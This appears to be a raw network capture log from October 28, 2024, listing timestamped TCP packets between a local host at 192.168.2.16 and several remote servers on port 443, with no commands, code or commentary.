                                                                                                                                                Oct 28, 2024 17:47:32.032222033 CET4434971335.190.80.1192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:32.032335997 CET49713443192.168.2.1635.190.80.1
                                                                                                                                                Oct 28, 2024 17:47:32.514642954 CET44349717188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:32.514998913 CET49717443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:32.515022039 CET44349717188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:32.515413046 CET44349717188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:32.515784025 CET49717443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:32.515866995 CET44349717188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:32.515976906 CET49717443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:32.547983885 CET49678443192.168.2.1620.189.173.10
                                                                                                                                                Oct 28, 2024 17:47:32.563319921 CET44349717188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:32.683947086 CET49720443192.168.2.16142.250.185.228
                                                                                                                                                Oct 28, 2024 17:47:32.684007883 CET44349720142.250.185.228192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:32.684101105 CET49720443192.168.2.16142.250.185.228
                                                                                                                                                Oct 28, 2024 17:47:32.684387922 CET49720443192.168.2.16142.250.185.228
                                                                                                                                                Oct 28, 2024 17:47:32.684418917 CET44349720142.250.185.228192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:32.694727898 CET44349717188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:32.694925070 CET44349717188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:32.694953918 CET44349717188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:32.695015907 CET49717443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:32.695045948 CET44349717188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:32.695118904 CET44349717188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:32.695166111 CET44349717188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:32.695219994 CET49717443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:32.695235968 CET44349717188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:32.695261955 CET49717443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:32.695308924 CET49717443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:32.695337057 CET44349717188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:32.695357084 CET44349717188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:32.695431948 CET49717443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:32.696049929 CET49717443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:32.696068048 CET44349717188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:32.708125114 CET44349716184.28.90.27192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:32.708247900 CET49716443192.168.2.16184.28.90.27
                                                                                                                                                Oct 28, 2024 17:47:32.711190939 CET49716443192.168.2.16184.28.90.27
                                                                                                                                                Oct 28, 2024 17:47:32.711209059 CET44349716184.28.90.27192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:32.711525917 CET44349716184.28.90.27192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:32.725438118 CET49716443192.168.2.16184.28.90.27
                                                                                                                                                Oct 28, 2024 17:47:32.758305073 CET49721443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:32.758394957 CET44349721188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:32.758493900 CET49721443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:32.759124994 CET49721443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:32.759155035 CET44349721188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:32.771332979 CET44349716184.28.90.27192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:32.849478960 CET49678443192.168.2.1620.189.173.10
                                                                                                                                                Oct 28, 2024 17:47:32.972243071 CET44349716184.28.90.27192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:32.972322941 CET44349716184.28.90.27192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:32.972399950 CET49716443192.168.2.16184.28.90.27
                                                                                                                                                Oct 28, 2024 17:47:32.973428965 CET49716443192.168.2.16184.28.90.27
                                                                                                                                                Oct 28, 2024 17:47:32.973475933 CET44349716184.28.90.27192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:32.973493099 CET49716443192.168.2.16184.28.90.27
                                                                                                                                                Oct 28, 2024 17:47:32.973510027 CET44349716184.28.90.27192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:33.384097099 CET44349721188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:33.384660959 CET49721443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:33.384727001 CET44349721188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:33.385782957 CET44349721188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:33.385890007 CET49721443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:33.386529922 CET49721443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:33.386565924 CET49721443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:33.386622906 CET44349721188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:33.386791945 CET44349721188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:33.386854887 CET49721443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:33.386919975 CET49721443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:33.386919975 CET49721443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:33.386955976 CET44349721188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:33.387140989 CET49721443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:33.387361050 CET49722443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:33.387444019 CET44349722188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:33.387562037 CET49722443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:33.387870073 CET49722443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:33.387903929 CET44349722188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:33.462515116 CET49678443192.168.2.1620.189.173.10
                                                                                                                                                Oct 28, 2024 17:47:33.700469971 CET49673443192.168.2.16204.79.197.203
                                                                                                                                                Oct 28, 2024 17:47:34.513910055 CET44349722188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:34.514250994 CET49722443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:34.514317989 CET44349722188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:34.515373945 CET44349722188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:34.515465021 CET49722443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:34.515836000 CET49722443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:34.515901089 CET44349722188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:34.516093969 CET49722443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:34.516134024 CET44349722188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:34.518074989 CET44349720142.250.185.228192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:34.518285036 CET49720443192.168.2.16142.250.185.228
                                                                                                                                                Oct 28, 2024 17:47:34.518311024 CET44349720142.250.185.228192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:34.519364119 CET44349720142.250.185.228192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:34.519448996 CET49720443192.168.2.16142.250.185.228
                                                                                                                                                Oct 28, 2024 17:47:34.525693893 CET49720443192.168.2.16142.250.185.228
                                                                                                                                                Oct 28, 2024 17:47:34.525790930 CET44349720142.250.185.228192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:34.557490110 CET49722443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:34.573504925 CET49720443192.168.2.16142.250.185.228
                                                                                                                                                Oct 28, 2024 17:47:34.573524952 CET44349720142.250.185.228192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:34.621495962 CET49720443192.168.2.16142.250.185.228
                                                                                                                                                Oct 28, 2024 17:47:34.669493914 CET49678443192.168.2.1620.189.173.10
                                                                                                                                                Oct 28, 2024 17:47:34.873785973 CET44349722188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:34.873837948 CET44349722188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:34.873867989 CET44349722188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:34.873899937 CET44349722188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:34.873936892 CET44349722188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:34.873946905 CET49722443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:34.873977900 CET44349722188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:34.873994112 CET49722443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:34.874057055 CET49722443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:34.875576019 CET44349722188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:34.875628948 CET44349722188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:34.875657082 CET44349722188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:34.875720024 CET49722443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:34.875730991 CET44349722188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:34.875811100 CET49722443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:34.991792917 CET44349722188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:34.991856098 CET44349722188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:34.991882086 CET44349722188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:34.991908073 CET44349722188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:34.991933107 CET44349722188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:34.991947889 CET49722443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:34.991961956 CET44349722188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:34.991988897 CET44349722188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:34.992007971 CET49722443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:34.992007971 CET49722443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:34.992026091 CET44349722188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:34.992129087 CET49722443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:34.992137909 CET44349722188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:35.035501957 CET49722443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:35.035550117 CET44349722188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:35.077332020 CET49722443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:35.109292984 CET44349722188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:35.109363079 CET44349722188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:35.109397888 CET44349722188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:35.109425068 CET44349722188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:35.109466076 CET49722443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:35.109504938 CET44349722188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:35.109534025 CET49722443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:35.109963894 CET44349722188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:35.109997034 CET44349722188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:35.110024929 CET49722443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:35.110028982 CET44349722188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:35.110039949 CET44349722188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:35.110085964 CET49722443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:35.110847950 CET44349722188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:35.110893011 CET44349722188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:35.110929012 CET49722443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:35.110943079 CET44349722188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:35.111022949 CET49722443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:35.111231089 CET44349722188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:35.162497997 CET49722443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:35.226439953 CET44349722188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:35.226505995 CET44349722188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:35.226535082 CET44349722188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:35.226588011 CET49722443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:35.226627111 CET44349722188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:35.226780891 CET49722443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:35.226937056 CET44349722188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:35.227067947 CET44349722188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:35.227094889 CET44349722188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:35.227150917 CET49722443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:35.227159977 CET44349722188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:35.227231026 CET49722443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:35.269500017 CET44349722188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:35.270139933 CET49722443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:35.343542099 CET44349722188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:35.343647003 CET49722443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:35.343861103 CET44349722188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:35.343930960 CET44349722188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:35.343931913 CET49722443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:35.343971968 CET44349722188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:35.344006062 CET49722443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:35.344127893 CET49722443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:35.344858885 CET44349722188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:35.344934940 CET49722443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:35.388309956 CET44349722188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:35.388418913 CET49722443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:35.460664988 CET44349722188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:35.460783958 CET49722443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:35.460866928 CET44349722188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:35.460927963 CET49722443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:35.461960077 CET44349722188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:35.462050915 CET49722443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:35.504657984 CET44349722188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:35.504705906 CET44349722188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:35.504770041 CET49722443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:35.504842043 CET44349722188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:35.504887104 CET49722443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:35.559504986 CET49722443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:35.581346989 CET44349722188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:35.581393957 CET44349722188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:35.581434011 CET44349722188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:35.581453085 CET49722443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:35.581471920 CET44349722188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:35.581496954 CET44349722188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:35.581516981 CET49722443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:35.581547976 CET49722443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:35.581784010 CET49722443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:35.581804037 CET44349722188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:35.601561069 CET49723443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:35.601599932 CET44349723188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:35.601721048 CET49723443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:35.601938963 CET49723443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:35.601948977 CET44349723188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:35.603300095 CET49724443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:35.603342056 CET44349724188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:35.603470087 CET49724443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:35.603930950 CET49724443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:35.603945971 CET44349724188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:35.604578972 CET49725443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:35.604588032 CET44349725104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:35.604806900 CET49725443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:35.604994059 CET49725443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:35.605001926 CET44349725104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:36.091747999 CET49726443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:36.091789007 CET44349726188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:36.091890097 CET49726443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:36.092181921 CET49726443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:36.092196941 CET44349726188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:36.229866982 CET44349723188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:36.230292082 CET49723443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:36.230321884 CET44349723188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:36.231386900 CET44349723188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:36.231487036 CET49723443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:36.231780052 CET44349724188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:36.232971907 CET49723443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:36.233031034 CET44349723188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:36.233345985 CET49724443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:36.233360052 CET44349724188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:36.233556986 CET49723443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:36.233572960 CET44349723188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:36.234396935 CET44349724188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:36.234447002 CET49724443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:36.234949112 CET49724443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:36.234963894 CET49724443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:36.234996080 CET44349724188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:36.235017061 CET49724443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:36.235040903 CET49724443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:36.235408068 CET49727443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:36.235455990 CET44349727188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:36.235528946 CET49727443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:36.235790014 CET49727443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:36.235802889 CET44349727188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:36.245213985 CET44349725104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:36.245445013 CET49725443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:36.245452881 CET44349725104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:36.246459007 CET44349725104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:36.246517897 CET49725443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:36.247585058 CET49725443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:36.247637987 CET44349725104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:36.247975111 CET49725443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:36.247981071 CET44349725104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:36.279503107 CET49723443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:36.298456907 CET49725443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:36.369759083 CET44349723188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:36.369884014 CET44349723188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:36.369961023 CET49723443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:36.369968891 CET44349723188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:36.369998932 CET44349723188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:36.370039940 CET49723443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:36.370080948 CET44349723188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:36.370209932 CET44349723188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:36.370285988 CET44349723188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:36.370337009 CET49723443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:36.370357990 CET44349723188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:36.370456934 CET44349723188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:36.370462894 CET49723443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:36.370479107 CET44349723188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:36.370539904 CET49723443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:36.375030994 CET44349723188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:36.387038946 CET44349725104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:36.387094021 CET44349725104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:36.387125015 CET44349725104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:36.387159109 CET44349725104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:36.387186050 CET44349725104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:36.387183905 CET49725443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:36.387217999 CET44349725104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:36.387249947 CET49725443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:36.387262106 CET44349725104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:36.387276888 CET49725443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:36.387286901 CET44349725104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:36.387340069 CET49725443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:36.387343884 CET44349725104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:36.387356043 CET44349725104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:36.387433052 CET49725443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:36.387573957 CET44349725104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:36.424559116 CET49723443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:36.439511061 CET49725443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:36.487710953 CET44349723188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:36.487885952 CET44349723188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:36.487946987 CET49723443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:36.487971067 CET44349723188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:36.488003016 CET44349723188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:36.488117933 CET49723443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:36.488142014 CET44349723188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:36.488614082 CET44349723188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:36.488694906 CET44349723188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:36.488744020 CET49723443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:36.488753080 CET44349723188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:36.488805056 CET49723443192.168.2.16188.114.97.3
                                                                                                                                                Oct 28, 2024 17:47:36.488960981 CET44349723188.114.97.3192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:36.508690119 CET44349725104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:36.508779049 CET44349725104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:36.508822918 CET44349725104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:36.508840084 CET49725443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:36.508857012 CET44349725104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:36.508954048 CET49725443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:36.509025097 CET44349725104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:36.509100914 CET44349725104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:36.509136915 CET44349725104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:36.509182930 CET49725443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:36.509191036 CET44349725104.18.94.41192.168.2.16
